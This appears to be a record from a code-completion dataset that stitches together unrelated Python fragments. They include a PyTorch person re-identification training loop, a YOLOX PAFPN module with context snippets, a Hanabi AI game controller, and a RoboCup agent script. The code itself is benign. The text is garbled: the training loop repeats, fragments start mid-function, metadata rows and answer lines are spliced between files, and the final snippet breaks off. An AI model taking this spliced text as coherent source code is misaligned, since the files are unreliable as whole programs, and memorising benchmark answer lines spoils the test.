s_inputs, targets = self._parse_data(source_inputs)
s_features, s_cls_out, s_cls_out_1 = self.model(s_inputs, targets)
ori_features, _, _ = self.model(support_image, targets)
# backward main #
loss_ce, loss_ce_1, prec, prec_1 = self._forward(s_features, s_cls_out, s_cls_out_1, targets)
ori_features = ori_features/torch.norm(ori_features, dim=1).view(ori_features.shape[0],1)
#support_features = support_features/torch.norm(support_features, dim=1).view(support_features.shape[0],1)
loss_sp = torch.mean(torch.sum((ori_features - support_features)**2, dim=1))
#loss_sp = torch.mean(torch.sum(torch.abs(ori_features - support_features), dim=1))
loss = loss_ce + loss_ce_1 + 100 * loss_sp
losses_ce.update(loss_ce.item())
losses_ce_1.update(loss_ce_1.item())
losses_sp.update(loss_sp.item())
precisions.update(prec)
precisions_1.update(prec_1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
ema.update()
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % print_freq == 0):
print('Epoch: [{}][{}/{}]\t'
'LR:{:.8f}\t'
'Time {:.3f} ({:.3f})\t'
'Data {:.3f} ({:.3f})\t'
'Loss_ce {:.3f} ({:.3f})\t'
'Loss_ce_1 {:.3f} ({:.3f})\t'
'Loss_sp {:.3f} ({:.3f})\t'
'Prec {:.2%} ({:.2%}) \t'
'Prec_1 {:.2%} ({:.2%}) \t'
.format(epoch, i + 1, train_iters,optimizer.param_groups[0]["lr"],
batch_time.val, batch_time.avg,
data_time.val, data_time.avg,
losses_ce.val, losses_ce.avg,
losses_ce_1.val, losses_ce_1.avg,
losses_sp.val, losses_sp.avg,
precisions.val, precisions.avg,
precisions_1.val, precisions_1.avg))
def _parse_data(self, inputs):
imgs, _, pids, _ = inputs
inputs = imgs.cuda()
targets = pids.cuda()
return inputs, targets
def _forward(self, s_features, s_outputs, s_outputs_1, targets):
s_features = s_features.cuda()
s_outputs = s_outputs.cuda()
s_outputs_1 = s_outputs_1.cuda()
targets = targets.cuda()
loss_ce = self.criterion_ce(s_outputs, targets)
loss_ce_1 = self.criterion_ce(s_outputs_1, targets)
| from __future__ import print_function, absolute_import
class Trainer(object):
def __init__(self, model, name_feature_support, num_classes, margin=0.0):
super(Trainer, self).__init__()
self.model = model
self.name_support = np.array(name_feature_support[0])
self.pos = np.argsort(self.name_support)
self.feat_support = name_feature_support[1]
self.criterion_ce = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
self.criterion_ce_1 = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
#self.criterion_support = nn.MSELoss().cuda()#nn.L1Loss().cuda() #nn.MSELoss().cuda()
#self.criterion_cos_pair = CosfacePairwiseLoss(m=0.35, s=64).cuda()
#self.criterion_triple = SoftTripletLoss(margin=margin).cuda()
#self.w_ce = 10
#self.w_tri = 1
#print("The weight for loss_ce is ", self.w_ce)
#print("The weight for loss_tri is ", self.w_tri)
def train(self, epoch, data_loader, data_loader_support, optimizer, ema, train_iters=200, print_freq=1):
self.model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_ce = AverageMeter()
losses_ce_1 = AverageMeter()
losses_sp = AverageMeter()
#losses_cos_pair = AverageMeter()
#losses_tr = AverageMeter()
precisions = AverageMeter()
precisions_1 = AverageMeter()
end = time.time()
for i in range(train_iters):
source_inputs = data_loader.next()
support_image, labels_support = data_loader_support.next()
support_features = torch.Tensor(self.feat_support[self.pos[labels_support]]).cuda()
data_time.update(time.time() - end)
s_inputs, targets = self._parse_data(source_inputs)
s_features, s_cls_out, s_cls_out_1 = self.model(s_inputs, targets)
ori_features, _, _ = self.model(support_image, targets)
# backward main #
loss_ce, loss_ce_1, prec, prec_1 = self._forward(s_features, s_cls_out, s_cls_out_1, targets)
ori_features = ori_features/torch.norm(ori_features, dim=1).view(ori_features.shape[0],1)
#support_features = support_features/torch.norm(support_features, dim=1).view(support_features.shape[0],1)
loss_sp = torch.mean(torch.sum((ori_features - support_features)**2, dim=1))
#loss_sp = torch.mean(torch.sum(torch.abs(ori_features - support_features), dim=1))
loss = loss_ce + loss_ce_1 + 100 * loss_sp
losses_ce.update(loss_ce.item())
losses_ce_1.update(loss_ce_1.item())
losses_sp.update(loss_sp.item())
precisions.update(prec)
precisions_1.update(prec_1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
ema.update()
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % print_freq == 0):
print('Epoch: [{}][{}/{}]\t'
'LR:{:.8f}\t'
'Time {:.3f} ({:.3f})\t'
'Data {:.3f} ({:.3f})\t'
'Loss_ce {:.3f} ({:.3f})\t'
'Loss_ce_1 {:.3f} ({:.3f})\t'
'Loss_sp {:.3f} ({:.3f})\t'
'Prec {:.2%} ({:.2%}) \t'
'Prec_1 {:.2%} ({:.2%}) \t'
.format(epoch, i + 1, train_iters,optimizer.param_groups[0]["lr"],
batch_time.val, batch_time.avg,
data_time.val, data_time.avg,
losses_ce.val, losses_ce.avg,
losses_ce_1.val, losses_ce_1.avg,
losses_sp.val, losses_sp.avg,
precisions.val, precisions.avg,
precisions_1.val, precisions_1.avg))
def _parse_data(self, inputs):
imgs, _, pids, _ = inputs
inputs = imgs.cuda()
targets = pids.cuda()
return inputs, targets
def _forward(self, s_features, s_outputs, s_outputs_1, targets):
s_features = s_features.cuda()
s_outputs = s_outputs.cuda()
s_outputs_1 = s_outputs_1.cuda()
targets = targets.cuda()
loss_ce = self.criterion_ce(s_outputs, targets)
loss_ce_1 = self.criterion_ce(s_outputs_1, targets)
| prec, = accuracy(s_outputs.data, targets.data) | 0 | 2023-12-17 11:32:48+00:00 | 4k |
alibaba/u2mot | yolox/models/yolo_pafpn.py | [
{
"identifier": "CSPDarknet",
"path": "yolox/models/darknet.py",
"snippet": "class CSPDarknet(nn.Module):\n def __init__(\n self,\n dep_mul,\n wid_mul,\n out_features=(\"dark3\", \"dark4\", \"dark5\"),\n depthwise=False,\n act=\"silu\",\n ):\n super().__init__()\n assert out_features, \"please provide output features of Darknet\"\n self.out_features = out_features\n Conv = DWConv if depthwise else BaseConv\n\n base_channels = int(wid_mul * 64) # 64\n base_depth = max(round(dep_mul * 3), 1) # 3\n\n # stem\n self.stem = Focus(3, base_channels, ksize=3, act=act)\n\n # dark2\n self.dark2 = nn.Sequential(\n Conv(base_channels, base_channels * 2, 3, 2, act=act),\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 2,\n base_channels * 2,\n n=base_depth,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n # dark3\n self.dark3 = nn.Sequential(\n Conv(base_channels * 2, base_channels * 4, 3, 2, act=act),\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 4,\n base_channels * 4,\n n=base_depth * 3,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n # dark4\n self.dark4 = nn.Sequential(\n Conv(base_channels * 4, base_channels * 8, 3, 2, act=act),\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 8,\n base_channels * 8,\n n=base_depth * 3,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n # dark5\n self.dark5 = nn.Sequential(\n Conv(base_channels * 8, base_channels * 16, 3, 2, act=act),\n SPPBottleneck(base_channels * 16, base_channels * 16, activation=act), # SPP\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 16,\n base_channels * 16,\n n=base_depth,\n shortcut=False,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n def forward(self, x):\n '''\n x --> stem --> dark2 --> dark3 --> dark4 --> dark5 --> output\n stem: Focus\n dark2: Conv --> CSPLayer\n dark3: Conv --> CSPLayer\n dark4: Conv --> CSPLayer\n dark5: Conv --> SPPBottleneck --> CSPLayer\n '''\n outputs = {}\n x = self.stem(x)\n outputs[\"stem\"] = x\n x = self.dark2(x)\n outputs[\"dark2\"] = x\n x = self.dark3(x)\n outputs[\"dark3\"] = x\n x = self.dark4(x)\n outputs[\"dark4\"] = x\n x = self.dark5(x)\n outputs[\"dark5\"] = x\n return {k: v for k, v in outputs.items() if k in self.out_features} # get feature w.r.t self.out_features"
},
{
"identifier": "BaseConv",
"path": "yolox/models/network_blocks.py",
"snippet": "class BaseConv(nn.Module):\n \"\"\"A Conv2d -> Batchnorm -> silu/leaky relu block\"\"\"\n\n def __init__(\n self, in_channels, out_channels, ksize, stride, groups=1, bias=False, act=\"silu\"\n ):\n super().__init__()\n # use same padding\n pad = (ksize - 1) // 2\n self.conv = nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=ksize,\n stride=stride,\n padding=pad,\n groups=groups,\n bias=bias,\n )\n self.bn = nn.BatchNorm2d(out_channels)\n self.act = get_activation(act, inplace=True)\n\n def forward(self, x):\n '''\n x --> Conv2d --> BN --> activation --> x\n '''\n return self.act(self.bn(self.conv(x))) # Conv ==> BN ==> activate\n\n def fuseforward(self, x):\n return self.act(self.conv(x))"
},
{
"identifier": "CSPLayer",
"path": "yolox/models/network_blocks.py",
"snippet": "class CSPLayer(nn.Module):\n \"\"\"C3 in yolov5, CSP Bottleneck with 3 convolutions\"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n n=1,\n shortcut=True,\n expansion=0.5,\n depthwise=False,\n act=\"silu\",\n ):\n \"\"\"\n Args:\n in_channels (int): input channels.\n out_channels (int): output channels.\n n (int): number of Bottlenecks. Default value: 1.\n \"\"\"\n # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n hidden_channels = int(out_channels * expansion) # hidden channels\n self.conv1 = BaseConv(in_channels, hidden_channels, 1, stride=1, act=act)\n self.conv2 = BaseConv(in_channels, hidden_channels, 1, stride=1, act=act)\n self.conv3 = BaseConv(2 * hidden_channels, out_channels, 1, stride=1, act=act)\n module_list = [\n Bottleneck(\n hidden_channels, hidden_channels, shortcut, 1.0, depthwise, act=act\n )\n for _ in range(n)\n ]\n self.m = nn.Sequential(*module_list)\n\n def forward(self, x):\n '''\n | BaseConv --> Bottleneck * n \\\n x --> cat --> BaseConv\n \\ BaseConv |\n '''\n x_1 = self.conv1(x)\n x_2 = self.conv2(x)\n x_1 = self.m(x_1)\n x = torch.cat((x_1, x_2), dim=1)\n return self.conv3(x)"
},
{
"identifier": "DWConv",
"path": "yolox/models/network_blocks.py",
"snippet": "class DWConv(nn.Module):\n \"\"\"Depthwise Conv (with BN and activation) + Pointwise Conv (with BN and activation)\"\"\"\n\n def __init__(self, in_channels, out_channels, ksize, stride=1, act=\"silu\"):\n super().__init__()\n self.dconv = BaseConv(\n in_channels,\n in_channels,\n ksize=ksize,\n stride=stride,\n groups=in_channels, # depthwise\n act=act,\n )\n self.pconv = BaseConv(\n in_channels, out_channels, ksize=1, stride=1, groups=1, act=act\n )\n\n def forward(self, x):\n '''\n x --> dconv (e.g. depthwise conv --> BN --> act) --> pconv (e.g. pointwise conv --> BN --> act) --> x\n '''\n x = self.dconv(x)\n return self.pconv(x)"
}
] | import torch
import torch.nn as nn
from .darknet import CSPDarknet
from .network_blocks import BaseConv, CSPLayer, DWConv | 1,948 | #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOPAFPN(nn.Module):
"""
YOLOv3 model. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=1.0,
width=1.0,
in_features=("dark3", "dark4", "dark5"),
in_channels=[256, 512, 1024],
depthwise=False,
act="silu",
):
super().__init__()
| #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOPAFPN(nn.Module):
"""
YOLOv3 model. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=1.0,
width=1.0,
in_features=("dark3", "dark4", "dark5"),
in_channels=[256, 512, 1024],
depthwise=False,
act="silu",
):
super().__init__() | self.backbone = CSPDarknet(depth, width, depthwise=depthwise, act=act) | 0 | 2023-12-18 10:04:40+00:00 | 4k |
UnbSky/Hanabi-AI-Assitant | game_controller.py | [
{
"identifier": "load_model",
"path": "play_util.py",
"snippet": "def load_model(model_name=None):\n #device = 'cuda' if torch.cuda.is_available() else 'cpu' # examples: 'cpu', 'cuda', 'cuda:0', 'cuda:1', etc.\n device = 'cpu'\n\n acition_dict_toid = {}\n if model_name is None:\n dict_path = 'dict.json'\n else:\n dict_path = f'{model_name}/dict.json'\n with open(dict_path, 'r', encoding='utf-8') as file:\n acition_dict = json.load(file)\n acition_dict = [\"<pad>\"] + acition_dict\n ind = 0\n for action in acition_dict:\n acition_dict_toid[action] = ind\n #print(action, ind)\n ind += 1\n n_vacabs = len(acition_dict)\n output_acition_dict_toid = {}\n if model_name is None:\n output_dict_path = 'output_dict.json'\n else:\n output_dict_path = f'{model_name}/output_dict.json'\n with open(output_dict_path, 'r', encoding='utf-8') as file:\n output_acition_dict = json.load(file)\n output_acition_dict = [\"<pad>\"] + output_acition_dict\n ind = 0\n for action in output_acition_dict:\n output_acition_dict_toid[action] = ind\n #print(action, ind)\n ind += 1\n n_vacabs_out = len(output_acition_dict)\n\n if model_name is None:\n max_seq_len = 900\n dim = 384\n n_layers = 8\n n_heads = 8\n multiple_of = 32\n dropout = 0.0\n model_args = dict(\n dim=dim,\n n_layers=n_layers,\n n_heads=n_heads,\n n_kv_heads=n_heads,\n vocab_size=n_vacabs,\n output_vocab_size=n_vacabs_out,\n multiple_of=multiple_of,\n max_seq_len=max_seq_len,\n dropout=dropout,\n ) # s\n else:\n with open(f'{model_name}/config.json', 'r') as json_file:\n model_args = json.load(json_file)\n\n seed = 1337\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cuda.matmul.allow_tf32 = True # allow tf32 on matmul\n torch.backends.cudnn.allow_tf32 = True # allow tf32 on cudnn\n\n # init from a model saved in a specific directory\n if model_name is None:\n ckpt_path = 'best_valid.pth'\n else:\n ckpt_path = f'{model_name}/model.pth'\n state_dict = torch.load(ckpt_path, map_location=device)\n gptconf = ModelArgs(**model_args)\n model = Transformer(gptconf)\n unwanted_prefix = '_orig_mod.'\n for k, v in list(state_dict.items()):\n if k.startswith(unwanted_prefix):\n state_dict[k[len(unwanted_prefix):]] = state_dict.pop(k)\n model.load_state_dict(state_dict, strict=False)\n model.eval()\n model.to(device)\n return model, acition_dict, acition_dict_toid, output_acition_dict, output_acition_dict_toid, device"
},
{
"identifier": "generate_answer",
"path": "play_util.py",
"snippet": "def generate_answer(model, input_actions, acition_dict_toid, device, topk):\n input_id = []\n for action in input_actions:\n if len(action) < 1:\n continue\n if any(char.isalpha() for char in action):\n action = action.replace(\"light-myself\",\"light_myself\")\n action = action.strip()\n if action not in acition_dict_toid:\n print(f\"NULL[{action}]\")\n return f\"NULL[{action}]\"\n input_id.append(acition_dict_toid[action])\n #print(input_id)\n input_id = np.array([input_id])\n input_id = torch.from_numpy(input_id)\n input_id = input_id.to(device)\n idx, probs = model.play_topk(input_id, topk)\n return idx, probs"
}
] | from play_util import load_model, generate_answer
from dataclasses import dataclass
import random
import logging | 3,552 | # 游戏初始情况
if "6 Suits" in self.variant_name:
            # 6 suits
self.Irank = [0, 0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5, 5]
index_amount = 6
self.special_dict.last_special_card = 5
self.total_card = 60
else:
            # 5 suits
self.Irank = [0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5]
index_amount = 5
self.special_dict.last_special_card = 4
self.total_card = 50
for vstr in variant_one_card:
if vstr in self.variant_name:
self.last_one_card = True
self.total_card -= 5
break
for vstr in no_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_color_rule = True
break
for vstr in all_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_color_rule = True
break
for vstr in no_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_rank_rule = True
break
for vstr in all_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_rank_rule = True
break
for pid in range(self.players_count):
self.players.append(GamePlayer(pid, self))
def set_current_history(self, index):
history_dict = self.game_history[index]
self.Irank = history_dict["Irank"]
self.Hrank = history_dict["Hrank"]
self.score = sum(self.Irank)
for i in range(self.players_count):
self.players[i].cards = history_dict["cards"][i]
self.players[i].known_cards = history_dict["kcards"][i]
self.clue = history_dict["clue"]
self.active_pid = history_dict["active_pid"]
action_token = history_dict["action_token"]
action = self.get_action(action_token, self.active_pid)
return action
def get_current_card(self):
current_card = self.total_card - self.score - len(self.discard_cards) - self.players_count * self.players_card_count
if current_card <= 0:
return 0
return current_card
def add_card_deck(self, card):
self.all_cards.append(card)
def __init__(self, model_data=None):
if model_data is None:
self.model, self.action_dict_toact, self.action_dict_toid, self.output_action_dict_toact, self.output_action_dict_toid, self.device = load_model()
else:
self.model = model_data[0]
self.action_dict_toact = model_data[1]
self.action_dict_toid = model_data[2]
self.output_action_dict_toact = model_data[3]
self.output_action_dict_toid = model_data[4]
self.device = model_data[5]
def parse_card(self, card):
if card[1] == "_":
index = 9
else:
index = int(card[1])
if card[3] == "_":
rank = 9
else:
rank = int(card[3])
return index, rank
def update_AI_token(self, active_pid):
        # Fill in every player's current hand information
light_cards = [[] for _ in range(self.players_count)]
# for iindex in range(len(self.Irank)):
# irank_str = f"irank-I{iindex}R{self.Irank[iindex]}"
# #print(irank_str)
# self.AItokens[active_pid].append(irank_str)
# self.AItokens[active_pid].append(f"score-{self.score}")
for pid in range(self.players_count):
rpid = pid - active_pid
if rpid < 0:
rpid += self.players_count
player = self.players[pid]
if rpid == 0:
light_cards[rpid] = player.get_light_card_myself()
else:
light_cards[rpid] = player.get_light_card(rpid)
for i in range(len(light_cards) - 1, -1, -1):
self.AItokens[active_pid].extend(light_cards[i])
self.AImasks[active_pid].extend([0] * len(light_cards[i]))
        # Update the game-state tokens for the AIs
self.AItokens[active_pid].append(self.op_token)
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"myturn-{self.AIturn[active_pid]}")
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"clues-{self.clue}")
self.AImasks[active_pid].append(0)
def call_AI_predict(self, active_pid, topk):
        # AI action (update tokens)
self.update_AI_token(active_pid)
|
def get_logger(filename, verbosity=1, name=None):
level_dict = {0: logging.DEBUG, 1: logging.INFO, 2: logging.WARNING}
formatter = logging.Formatter(
"[%(asctime)s][%(filename)s][%(levelname)s] %(message)s"
)
logger = logging.getLogger(name)
logger.setLevel(level_dict[verbosity])
fh = logging.FileHandler(filename, "w")
fh.setFormatter(formatter)
logger.addHandler(fh)
# sh = logging.StreamHandler()
# sh.setFormatter(formatter)
# logger.addHandler(sh)
return logger
logger = get_logger('gameplay_log.log')
@dataclass
class GameArgs:
players: int = 2
players_card: int = 5
AIplayer: list = None
variant: str = "No Variant"
random_start: bool = True
start_card: list = None
allow_drawback: bool = False
@dataclass
class SpecialGameArgs:
no_color_rule: bool = False
all_color_rule: bool = False
no_rank_rule: bool = False
all_rank_rule: bool = False
last_special_card: int = 4
def try_start_game(gameargs: GameArgs):
return GameController(gameargs)
class GamePlayer():
def __init__(self, pid, game_controller):
self.cards = []
self.known_cards = []
self.online_order = []
self.pid = pid
self.game_controller = game_controller
def gain_card(self, card, order=None):
self.cards.append(card)
self.online_order.append(order)
self.known_cards.append("I_R_")
def get_light_card(self, rpid):
light_tokens = []
for i in range(len(self.cards)):
lcard = self.cards[i]
kcard = self.known_cards[i]
token = f"light-PR{rpid}-{lcard}-{kcard}"
light_tokens.append(token)
return light_tokens
def get_light_card_myself(self):
light_tokens = []
for i in range(len(self.cards)):
kcard = self.known_cards[i]
token = f"light_myself-{kcard}"
light_tokens.append(token)
return light_tokens
def get_card_at(self, index):
return self.cards[index], self.known_cards[index]
def remove_card_at(self, index):
self.cards.pop(index)
self.known_cards.pop(index)
self.online_order.pop(index)
def get_clue(self, clue, clue_type, clue_value):
        # A clue is formatted as an I_ or an R_
for card_ind in range(len(self.cards)):
# print(clue_info, target_card[card_ind], (clue_info in target_card[card_ind]))
if clue in self.cards[card_ind]:
kcard = self.known_cards[card_ind]
if clue_type == 0:
self.known_cards[card_ind] = kcard[:1] + f"{clue_value}" + kcard[2:]
elif clue_type == 1:
self.known_cards[card_ind] = kcard[:3] + f"{clue_value}" + kcard[4:]
# I_R_ represents a card; IURU is used when a player's own card is unknown
class GameController():
def start_game(self, gameargs: GameArgs):
# if not gameargs.random_start:
# if gameargs.start_card is None:
# print("ERROR: 没有设置开始牌型")
# elif len(gameargs.start_card) != gameargs.players * gameargs.players_card:
# print("ERROR: 并非所有玩家都有初始牌型")
# elif gameargs.allow_drawback:
# print("ERROR: 非随机对局不允许撤回AI的操作")
# self.online_card_order = []
self.game_history = []
self.players_count = gameargs.players
self.players_card_count = gameargs.players_card
self.players = []
self.AIplayes = gameargs.AIplayer
self.AItokens = [[] for _ in range(self.players_count)]
self.AImasks = [[] for _ in range(self.players_count)]
self.AIturn = [1 for _ in range(self.players_count)]
self.draw_check_value = random.randint(2, 7)
        # For now, every variant defaults to the normal rules
self.allow_drawback = gameargs.allow_drawback
        # Whether this is a randomly dealt game (meaning only AIs are present and the whole game runs automatically)
self.ramdom_start = gameargs.random_start
        # All cards; they are dealt in this order
self.all_cards = []
self.discard_cards = []
        # Index of the card dealt so far
self.current_card_index = 0
self.game_actions = []
self.action_list_cache = None
self.op_token = f"OP-{gameargs.variant}-P{self.players_count}"
self.turn = 0
self.clue = 8
self.score = 0
self.mistake = 0
self.active_pid = 0
        # Irank is the current state of each suit
self.remain_round = self.players_count
variant_one_card = ["Dark Null", "Dark Brown", "Cocoa Rainbow", "Gray", "Black", "Dark Rainbow", "Gray Pink",
"Dark Pink", "Dark Omni"]
no_color_rule_variant = ["Null", "White", "Light Pink", "Dark Null", "Gray", "Gray Pink"]
all_color_rule_variant = ["Muddy Rainbow", "Rainbow", "Omni", "Cocoa Rainbow", "Dark Rainbow", "Dark Omni"]
no_rank_rule_variant = ["Null", "Brown", "Muddy Rainbow", "Dark Null", "Dark Brown", "Cocoa Rainbow"]
all_rank_rule_variant = ["Light Pink", "Pink", "Omni", "Gray Pink", "Dark Pink", "Dark Omni"]
self.variant_name = gameargs.variant
self.last_one_card = False
self.special_dict = SpecialGameArgs()
        # Initial game setup
if "6 Suits" in self.variant_name:
            # 6 suits
self.Irank = [0, 0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5, 5]
index_amount = 6
self.special_dict.last_special_card = 5
self.total_card = 60
else:
            # 5 suits
self.Irank = [0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5]
index_amount = 5
self.special_dict.last_special_card = 4
self.total_card = 50
for vstr in variant_one_card:
if vstr in self.variant_name:
self.last_one_card = True
self.total_card -= 5
break
for vstr in no_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_color_rule = True
break
for vstr in all_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_color_rule = True
break
for vstr in no_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_rank_rule = True
break
for vstr in all_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_rank_rule = True
break
for pid in range(self.players_count):
self.players.append(GamePlayer(pid, self))
def set_current_history(self, index):
history_dict = self.game_history[index]
self.Irank = history_dict["Irank"]
self.Hrank = history_dict["Hrank"]
self.score = sum(self.Irank)
for i in range(self.players_count):
self.players[i].cards = history_dict["cards"][i]
self.players[i].known_cards = history_dict["kcards"][i]
self.clue = history_dict["clue"]
self.active_pid = history_dict["active_pid"]
action_token = history_dict["action_token"]
action = self.get_action(action_token, self.active_pid)
return action
def get_current_card(self):
current_card = self.total_card - self.score - len(self.discard_cards) - self.players_count * self.players_card_count
if current_card <= 0:
return 0
return current_card
def add_card_deck(self, card):
self.all_cards.append(card)
def __init__(self, model_data=None):
if model_data is None:
self.model, self.action_dict_toact, self.action_dict_toid, self.output_action_dict_toact, self.output_action_dict_toid, self.device = load_model()
else:
self.model = model_data[0]
self.action_dict_toact = model_data[1]
self.action_dict_toid = model_data[2]
self.output_action_dict_toact = model_data[3]
self.output_action_dict_toid = model_data[4]
self.device = model_data[5]
def parse_card(self, card):
if card[1] == "_":
index = 9
else:
index = int(card[1])
if card[3] == "_":
rank = 9
else:
rank = int(card[3])
return index, rank
def update_AI_token(self, active_pid):
        # Fill in every player's current hand information
light_cards = [[] for _ in range(self.players_count)]
# for iindex in range(len(self.Irank)):
# irank_str = f"irank-I{iindex}R{self.Irank[iindex]}"
# #print(irank_str)
# self.AItokens[active_pid].append(irank_str)
# self.AItokens[active_pid].append(f"score-{self.score}")
for pid in range(self.players_count):
rpid = pid - active_pid
if rpid < 0:
rpid += self.players_count
player = self.players[pid]
if rpid == 0:
light_cards[rpid] = player.get_light_card_myself()
else:
light_cards[rpid] = player.get_light_card(rpid)
for i in range(len(light_cards) - 1, -1, -1):
self.AItokens[active_pid].extend(light_cards[i])
self.AImasks[active_pid].extend([0] * len(light_cards[i]))
        # Update the game-state tokens for the AIs
self.AItokens[active_pid].append(self.op_token)
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"myturn-{self.AIturn[active_pid]}")
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"clues-{self.clue}")
self.AImasks[active_pid].append(0)
def call_AI_predict(self, active_pid, topk):
        # AI action (update tokens)
self.update_AI_token(active_pid) | action_ids, action_probs = generate_answer(self.model, self.AItokens[active_pid], self.action_dict_toid, self.device, topk) | 1 | 2023-12-17 03:57:47+00:00 | 4k |
m-abr/FCPCodebase | scripts/utils/Get_Up.py | [
{
"identifier": "Base_Agent",
"path": "agent/Base_Agent.py",
"snippet": "class Base_Agent():\n all_agents = []\n\n def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True,\n enable_draw:bool=True, apply_play_mode_correction:bool=True, wait_for_server:bool=True, hear_callback=None) -> None:\n\n self.radio = None # hear_message may be called during Server_Comm instantiation\n self.logger = Logger(enable_log, f\"{team_name}_{unum}\")\n self.world = World(robot_type, team_name, unum, apply_play_mode_correction, enable_draw, self.logger, host)\n self.world_parser = World_Parser(self.world, self.hear_message if hear_callback is None else hear_callback)\n self.scom = Server_Comm(host,agent_port,monitor_port,unum,robot_type,team_name,self.world_parser,self.world,Base_Agent.all_agents,wait_for_server)\n self.inv_kinematics = Inverse_Kinematics(self.world.robot)\n self.behavior = Behavior(self)\n self.path_manager = Path_Manager(self.world)\n self.radio = Radio(self.world, self.scom.commit_announcement)\n self.behavior.create_behaviors()\n Base_Agent.all_agents.append(self)\n\n @abstractmethod\n def think_and_send(self):\n pass\n\n def hear_message(self, msg:bytearray, direction, timestamp:float) -> None:\n if direction != \"self\" and self.radio is not None:\n self.radio.receive(msg)\n\n def terminate(self):\n # close shared monitor socket if this is the last agent on this thread\n self.scom.close(close_monitor_socket=(len(Base_Agent.all_agents)==1))\n Base_Agent.all_agents.remove(self)\n\n @staticmethod\n def terminate_all():\n for o in Base_Agent.all_agents:\n o.scom.close(True) # close shared monitor socket, if it exists\n Base_Agent.all_agents = []"
},
{
"identifier": "Script",
"path": "scripts/commons/Script.py",
"snippet": "class Script():\n ROOT_DIR = path.dirname(path.dirname(realpath( join(getcwd(), dirname(__file__))) )) # project root directory\n\n def __init__(self, cpp_builder_unum=0) -> None:\n\n '''\n Arguments specification\n -----------------------\n - To add new arguments, edit the information below\n - After changing information below, the config.json file must be manually deleted\n - In other modules, these arguments can be accessed by their 1-letter ID\n '''\n # list of arguments: 1-letter ID, Description, Hardcoded default\n self.options = {'i': ('Server Hostname/IP', 'localhost'),\n 'p': ('Agent Port', '3100'),\n 'm': ('Monitor Port', '3200'),\n 't': ('Team Name', 'FCPortugal'),\n 'u': ('Uniform Number', '1'),\n 'r': ('Robot Type', '1'),\n 'P': ('Penalty Shootout', '0'),\n 'F': ('magmaFatProxy', '0'),\n 'D': ('Debug Mode', '1')}\n\n # list of arguments: 1-letter ID, data type, choices \n self.op_types = {'i': (str, None),\n 'p': (int, None),\n 'm': (int, None),\n 't': (str, None),\n 'u': (int, range(1,12)),\n 'r': (int, [0,1,2,3,4]),\n 'P': (int, [0,1]),\n 'F': (int, [0,1]),\n 'D': (int, [0,1])}\n \n '''\n End of arguments specification\n '''\n\n self.read_or_create_config()\n\n #advance help text position\n formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=52)\n parser = argparse.ArgumentParser(formatter_class=formatter)\n\n o = self.options\n t = self.op_types\n\n for id in self.options: # shorter metavar for aesthetic reasons\n parser.add_argument(f\"-{id}\", help=f\"{o[id][0]:30}[{o[id][1]:20}]\", type=t[id][0], nargs='?', default=o[id][1], metavar='X', choices=t[id][1])\n \n self.args = parser.parse_args()\n\n if getattr(sys, 'frozen', False): # disable debug mode when running from binary\n self.args.D = 0\n\n self.players = [] # list of created players\n\n Script.build_cpp_modules(exit_on_build = (cpp_builder_unum != 0 and cpp_builder_unum != self.args.u))\n\n if self.args.D:\n try:\n print(f\"\\nNOTE: for help run \\\"python {__main__.__file__} -h\\\"\")\n except:\n pass\n\n columns = [[],[],[]]\n for key, value in vars(self.args).items():\n columns[0].append(o[key][0])\n columns[1].append(o[key][1])\n columns[2].append(value)\n\n UI.print_table(columns, [\"Argument\",\"Default at /config.json\",\"Active\"], alignment=[\"<\",\"^\",\"^\"])\n\n\n def read_or_create_config(self) -> None:\n\n if not path.isfile('config.json'): # save hardcoded default values if file does not exist\n with open(\"config.json\", \"w\") as f:\n json.dump(self.options, f, indent=4)\n else: # load user-defined values (that can be overwritten by command-line arguments)\n if path.getsize(\"config.json\") == 0: # wait for possible write operation when launching multiple agents\n from time import sleep\n sleep(1)\n if path.getsize(\"config.json\") == 0: # abort after 1 second\n print(\"Aborting: 